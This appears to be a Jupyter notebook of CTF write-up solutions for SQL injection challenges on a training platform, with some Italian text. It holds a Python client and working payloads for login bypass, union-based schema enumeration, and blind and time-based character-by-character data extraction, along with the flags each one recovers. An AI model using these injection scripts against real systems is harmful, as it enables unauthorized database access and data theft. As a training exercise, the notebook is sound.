# SQL Injection

In [1]:
import requests as req

class SQLInj:
    def __init__(self, host):
        self.sess = req.Session() # Start the session. We want to save the cookies
        self.base_url = '{}/api/'.format(host)
        self._refresh_csrf_token() # Refresh the ANTI-CSRF token

    def _refresh_csrf_token(self):
        resp = self.sess.get(self.base_url + 'get_token')
        resp = resp.json()
        self.token = resp['token']

    def _do_raw_req(self, url, query):
        headers = {'X-CSRFToken': self.token}
        data = {'query': query }
        return self.sess.post(url,json=data, headers=headers).json()

    def logic(self, query):
        url = self.base_url + 'logic'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

    def union(self, query):
        url = self.base_url + 'union'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

    def blind(self, query):
        url = self.base_url + 'blind'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

    def time(self, query):
        url = self.base_url + 'time'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']


In [2]:
sqlInj = SQLInj('http://web-17.challs.olicyber.it')
res, err = sqlInj.logic("' OR 1=1 -- ")
print(res)

flag{1s_ths_h0w_l0g1ns_w0rk}


### Union-Based SQL injections

Useful tables of INFORMATION_SCHEMA for these attacks are:
<ul>
    <li>INFORMATION_SCHEMA.schemata: A list of every schema that is present in the database</li>
    <li>INFORMATION_SCHEMA.tables: A list of every table that is present in the database
        <ul>
            <li>tables.table_name: nome della tabella (può essere utile escludere alcune tabelle filtrando solo quelle che appartengono allo schema corrente, identificato dalla funzione DATABASE())
            <li>tables.table_schema: nome dello schema contenente la tabella
        </ul>
    </li>
    <li>INFORMATION_SCHEMA.columns: A list of every column that is present in the database
        <ul>
            <li>columns.column_name: nome della colonna</li>
            <li>columns.table_name: nome della tabella che contiene la colonna</li>
            <li>columns.table_schema: nome dello schema che contiene la tabella di cui al punto sopra</li>
        </ul>
    </li>
</ul>

group_concat is used to combine all the results inside one row: 
<ul>
    <li>group_concat(table_name,':',column_name) FROM ...</li>
</ul>

In [3]:
sqlInj = SQLInj('http://web-17.challs.olicyber.it')
res, err = sqlInj.logic("' OR 1=1 -- ")

# retrieving number of columns for SQL union
col_num = 0
err = 0
while not err:
    col_num+=1
    res, err = sqlInj.union("1' ORDER BY " + str(col_num) + " -- ")

col_num -= 1

print("Snd table must have '" + str(col_num) + "' column" + '\n')

# retrieving some DB info
fill = ', '.join(str(i) for i in range(1, col_num)) + ', ' # filling some columns
res, err = sqlInj.union("1' AND 1=0 UNION SELECT " + fill + "version() -- ")
print("MYSQL version: " + res.replace(fill, '') + '\n')

# retrieving table names
res, err = sqlInj.union("1' AND 1=0 UNION SELECT " + fill + "table_name FROM information_schema.tables WHERE table_schema = DATABASE() -- ")
print("Tables: \n" + res.replace(fill, '') + '\n')

# retrieving column names
table_name = 'real_data'
res, err = sqlInj.union("1' AND 1=0 UNION SELECT " + fill + "column_name FROM information_schema.columns WHERE table_name = '" + table_name + "' -- ")
print("Column: \n" + res.replace(fill, '') + '\n')

# retrieving column
col_name = 'flag'
res, err = sqlInj.union("1' AND 1=0 UNION SELECT " + fill + col_name + " FROM " + table_name + " -- ")
print("Flag: " + res.replace(fill, '') + '\n')


Snd table must have '6' column

MYSQL version: 8.0.33

Tables: 
real_data
dummy_data

Column: 
id
flag

Flag: flag{Uni0ns_4re_so_tr1vi4l}



### Blind SQL injection 
The general method to correctly craft an exploit is the following:
<ul>
    <li>Find a payload that returns true/false based only on an injected logical expression</li>
    <li>Find how to get the true/false response</li>
    <li>Write a simple script to automatize the extraction of the data</li>
</ul>

In [12]:
sqlInj = SQLInj('http://web-17.challs.olicyber.it')

hex_dictionary = '0123456789abcdef'
flag = ''

# retrieving flag in the 'asecret' column of the 'secret' table
while True:
    for c in hex_dictionary:
        question = f"1' AND (SELECT 1 FROM secret WHERE HEX(asecret) LIKE '{flag+c}%') = 1 -- "
        res, err = sqlInj.blind(question)
        if res == 'Success': # match a character
            flag += c
            print(flag)
            break
    else: 
        break # run out of characters in the dictionary

print(flag)


6
66
666
666c
666c6
666c61
666c616
666c6167
666c61677
666c61677b
666c61677b4
666c61677b41
666c61677b415
666c61677b415f
666c61677b415f6
666c61677b415f62
666c61677b415f626
666c61677b415f626c
666c61677b415f626c3
666c61677b415f626c31
666c61677b415f626c316
666c61677b415f626c316e
666c61677b415f626c316e6
666c61677b415f626c316e64
666c61677b415f626c316e647
666c61677b415f626c316e6479
666c61677b415f626c316e64795
666c61677b415f626c316e64795f
666c61677b415f626c316e64795f6
666c61677b415f626c316e64795f66
666c61677b415f626c316e64795f666
666c61677b415f626c316e64795f666c
666c61677b415f626c316e64795f666c3
666c61677b415f626c316e64795f666c34
666c61677b415f626c316e64795f666c346
666c61677b415f626c316e64795f666c3467
666c61677b415f626c316e64795f666c34677
666c61677b415f626c316e64795f666c34677d
666c61677b415f626c316e64795f666c34677d


### Time-Based SQL injection

example: SELECT sleep(1) FROM secrets WHERE secret LIKE 'a%' LIMIT 1

In [18]:
from time import time

sqlInj = SQLInj('http://web-17.challs.olicyber.it')

hex_dictionary = '0123456789abcdef'
flag = ''

# retrieving flag in the 'flag' column of the 'flags' table
while True:
    for c in hex_dictionary:
        question = f"1' AND (SELECT sleep(1) FROM flags WHERE HEX(flag) LIKE '{flag+c}%') = 1 -- "
        start = time()
        sqlInj.time(question)
        elapsed = time() - start

        if elapsed > 1: # match a character
            flag += c
            print(flag)
            break
    else: 
        break # run out of characters in the dictionary

print(flag)

6
66
666
666c
666c6
666c61
666c616
666c6167
666c61677
666c61677b
666c61677b4
666c61677b44
666c61677b446
666c61677b446f
666c61677b446f6
666c61677b446f6e
666c61677b446f6e7
666c61677b446f6e74
666c61677b446f6e745
666c61677b446f6e745f
666c61677b446f6e745f7
666c61677b446f6e745f74
666c61677b446f6e745f747
666c61677b446f6e745f7472
666c61677b446f6e745f74727
666c61677b446f6e745f747275
666c61677b446f6e745f7472757
666c61677b446f6e745f74727573
666c61677b446f6e745f747275733
666c61677b446f6e745f7472757337
666c61677b446f6e745f74727573375
666c61677b446f6e745f74727573375f
666c61677b446f6e745f74727573375f7
666c61677b446f6e745f74727573375f74
666c61677b446f6e745f74727573375f746
666c61677b446f6e745f74727573375f7469
666c61677b446f6e745f74727573375f74696
666c61677b446f6e745f74727573375f74696d
666c61677b446f6e745f74727573375f74696d3
666c61677b446f6e745f74727573375f74696d33
666c61677b446f6e745f74727573375f74696d337
666c61677b446f6e745f74727573375f74696d337d
666c61677b446f6e745f74727573375f74696d337d
